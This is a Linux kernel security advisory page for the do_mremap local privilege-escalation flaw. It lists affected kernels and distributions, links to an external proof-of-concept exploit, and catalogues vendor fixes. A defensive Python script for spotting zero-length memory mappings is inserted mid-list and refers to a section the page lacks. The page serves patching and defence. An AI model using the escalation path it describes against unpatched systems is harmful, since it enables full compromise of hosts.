+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4
Linux kernel 2.2.25
Linux kernel 2.2.24
Linux kernel 2.2.23
Linux kernel 2.2.22
Linux kernel 2.2.21
Linux kernel 2.2.20
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16 pre6
Linux kernel 2.2.16
Linux kernel 2.2.15 pre20
Linux kernel 2.2.15 pre16
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
Linux kernel 2.2.12
Linux kernel 2.2.11
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.2
Linux kernel 2.2.1
Linux kernel 2.2
Avaya Communication Manager Server S8700
Avaya Communication Manager Server S8500
Avaya Communication Manager Server S8300
Linux kernel 2.6.1 -rc2
Linux kernel 2.4.24

- Unaffected program versions

Linux kernel 2.6.1 -rc2
Linux kernel 2.4.24

- Vulnerability discussion

A vulnerability involving the do_mremap system function has been reported in the Linux kernel, allowing for local privilege escalation. Due to a bounds checking issue within the function, it is possible for local attackers to disrupt the operation of the kernel. Attack vectors also exist that may permit a local attacker to gain root privileges.

This type of vulnerability will permit a remote attacker who has gained limited privileges on a host to fully compromise the system.

- Exploit

A reliable proof-of-concept exploit has been developed by Paul Starzetz <ihaquer@isec.pl> and Wojciech Purczynski <cliph@isec.pl>. This exploit is presented in the following document:
http://isec.pl/vulnerabilities/isec-0013-mremap.txt

A proof-of-concept (mremap_poc.c) was also released to test whether the vulnerability is present in the kernel.

- Solution

Avaya has released an advisory to address this issue. Avaya recommends that customers contact their service representative to upgrade to field load 220. Further information can be found in the advisory located at the following URI:
http://support.avaya.com/japple/css/japple?temp.groupID=&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=158687&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Sun has released a fix to address this issue in the Sun Cobalt RaQ 550. The fix is linked below.

Debian has released an advisory (DSA 423-1) that addresses the issue that is described in this BID for the IA-64 architecture. Further details regarding obtaining and applying fixes can be found in the referenced advisory.

SmoothWall has released fixes to address this issue in SmoothWall Express 2.0. Users are advised to obtain the fixes through the SmoothWall interface. Please see the referenced web page (SWP-2004:001) for more information. Users may download the fixes1 patch by carrying out the following steps:

Go to Maintenance -> Updates on your SmoothWall web interface, and upload
the file called fixes1.

Debian has released advisory DSA 413-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2003:417-01 to address this issue. RHSA-2003:419-05 was also released to address Red Hat Enterprise distributions. An advisory (FEDORA-2003-046) was also released for Fedora distributions. See the referenced advisories for additional details.

Guardian Digital has released advisory ESA-20040105-001 for EnGarde Secure Linux. Fixes included in this advisory may be applied with the Guardian Digital WebTool.

Conectiva has released advisories CLA-2004:799 and CLSA-2004:804 to address this issue. Please see the attached advisories for details on obtaining and applying fixes.

Trustix has released advisory TSLSA-2004-01 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Astaro Security Linux has released kernel updates to address this issue in Up2Date 4.018.

SuSE has released security advisory SuSE-SA:2004:001 to address this issue. SuSE has also released security advisory SuSE-SA:2004:003 to address this issue for the 64bit kernel.

An advisory (IMNX-2004-73-001-01) was released for Immunix Secured OS that includes fixes to address this issue. Please see the referenced advisory for details on obtaining and applying fixes.

TurboLinux released an advisory (TLSA-2004-1) that includes fixes for this issue. Please see the attached reference for details on obtaining and applying fixes.

This issue has been addressed in the 2.4.24 release of the Linux kernel. This issue has also been addressed in the 2.6 series as of the 2.6.1-rc2 release.
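As an added defender-side example (not part of the iSEC advisory or its code), the following Python script parses /proc/<pid>/maps text in the format quoted in the advisory's Details section and flags VMAs of zero length or of a length that is not a whole number of pages, and checks a kernel version string against the fixed releases named on this page (2.4.24 and 2.6.1-rc2). The sample listing is constructed from the advisory's example, the 4 kB page size is the i386 value the advisory states, and all function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# i386 page size as stated in the advisory (4 kB).
PAGE_SIZE = 4096

# Constructed sample: the /proc/<pid>/maps listing quoted in the advisory,
# including the zero-length VMA it marks with [*] (60000000-60000000).
SAMPLE_MAPS = """\
08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
40015000-40016000 rw-p 00000000 00:00 0
4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
4015d000-4015f000 rw-p 00000000 00:00 0
60000000-60000000 rwxp 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0
"""

# One maps line: start-end perms offset dev inode [path]
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)(?:\s+(.*))?$"
)


@dataclass
class Vma:
    start: int
    end: int
    perms: str
    path: str

    @property
    def length(self) -> int:
        return self.end - self.start


def parse_maps(text: str) -> List[Vma]:
    """Parse /proc/<pid>/maps text into Vma records; lines that do not
    match the maps format are skipped."""
    vmas = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if not m:
            continue
        start, end = int(m.group(1), 16), int(m.group(2), 16)
        vmas.append(Vma(start, end, m.group(3), (m.group(7) or "").strip()))
    return vmas


def find_bogus_vmas(vmas: List[Vma]) -> List[Vma]:
    """Return VMAs a correctly working kernel never exposes: zero length (the
    advisory's [*] entry) or a length that is not a multiple of the page size."""
    return [v for v in vmas if v.length == 0 or v.length % PAGE_SIZE]


# Fixed releases named on this page: 2.4.24 for the 2.4 series and
# 2.6.1-rc2 for the 2.6 series. The page names no fixed 2.2 release.
_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?$")


def _version_key(version: str):
    """Turn '2.6.1-rc2' into a sortable tuple; a final release sorts after
    every -rc of the same number, so '2.6.1' > '2.6.1-rc2'."""
    m = _VER_RE.match(version.replace(" ", ""))
    if not m:
        raise ValueError(f"unrecognised kernel version: {version!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0),
            int(rc) if rc is not None else float("inf"))


def kernel_has_fix(version: str) -> Optional[bool]:
    """True if the kernel is at or past its series' fixed release, False if it
    is older, None for a series the page names no fixed release for (2.2)."""
    key = _version_key(version)
    if key[:2] == (2, 4):
        return key >= _version_key("2.4.24")
    if key[:2] == (2, 6):
        return key >= _version_key("2.6.1-rc2")
    return None


if __name__ == "__main__":
    for v in find_bogus_vmas(parse_maps(SAMPLE_MAPS)):
        print(f"[*] suspicious VMA {v.start:08x}-{v.end:08x} {v.perms} len={v.length}")
    for ver in ("2.4.23", "2.4.24", "2.6.1-rc1", "2.6.1-rc2", "2.6.1"):
        print(ver, "fixed" if kernel_has_fix(ver) else "not fixed")
```

On a live system the same parser can be fed the contents of /proc/<pid>/maps for each process; a zero-length entry is the artifact the advisory describes and is worth an alert.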

Debian has issued fixes for the PowerPC and Alpha platforms. See advisory DSA 417-2 in the reference section.

Slackware has released advisories SSA:2004-006-01 and SSA:2004-008-01 to address this issue.

Mandrake has released advisory MDKSA-2004:001 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released advisory GLSA 200401-01 to address this issue. Please see the attached advisory for more details. Gentoo fixes can be applied by carrying out the following commands:

emerge sync
emerge -pv your-favorite-sources

# IMPORTANT: IF YOUR KERNEL IS MARKED AS "Manual Update" THEN
# THE PORTAGE MAY REPORT THAT YOU HAVE THE SAME KERNEL ON
# YOUR SYSTEM. YOU SHOULD STILL UPDATE YOUR KERNEL!

emerge your-favorite-sources

# Follow usual procedures for compiling and installing a kernel.
# If you use genkernel, run genkernel as you would do normally.

SmoothWall has released alert SWP-2004:001 to address this issue.

Debian has issued fixes for the mips/mipsel architectures. See advisory DSA-427-1 (in the reference section).

SGI has released a security advisory 20040102-01-U including fixes to address this issue. Please see the attached advisory for more information.

VMWare has released a fix to address this issue in VMWare ESX Server 2.0.1 build 6403. Please see the referenced web page for more information.

Debian has released two advisories DSA-439-1 and DSA-440-1 to address this and other issues. Please see the referenced advisories for more information.

Debian has released DSA 442-1 to provide fixes for s390 platforms. Please see the attached advisory for further information.

Debian has released DSA 450-1 to provide MIPS kernel fixes. Please see the attached advisory for further details.

SGI has released an advisory 20040204-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

Debian has released DSA 470-1 to address this and other issues in the HP Precision architecture. Please see the referenced advisory for more information.

A VMWare advisory and fixes are available for their ESX Server package. Please see the reference section for more information.

Debian has released advisory DSA 475-1 with fixes dealing with this and other issues for the HP Precision architecture.


Sun Cobalt RaQ 550
VMWare ESX Server 2.0
SmoothWall Express 2.0 beta
SmoothWall Express 2.0 beta6
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test1
Linux kernel 2.4 .0-test5
Linux kernel 2.4.1
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
Linux kernel 2.4.17
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 x86
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.21

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.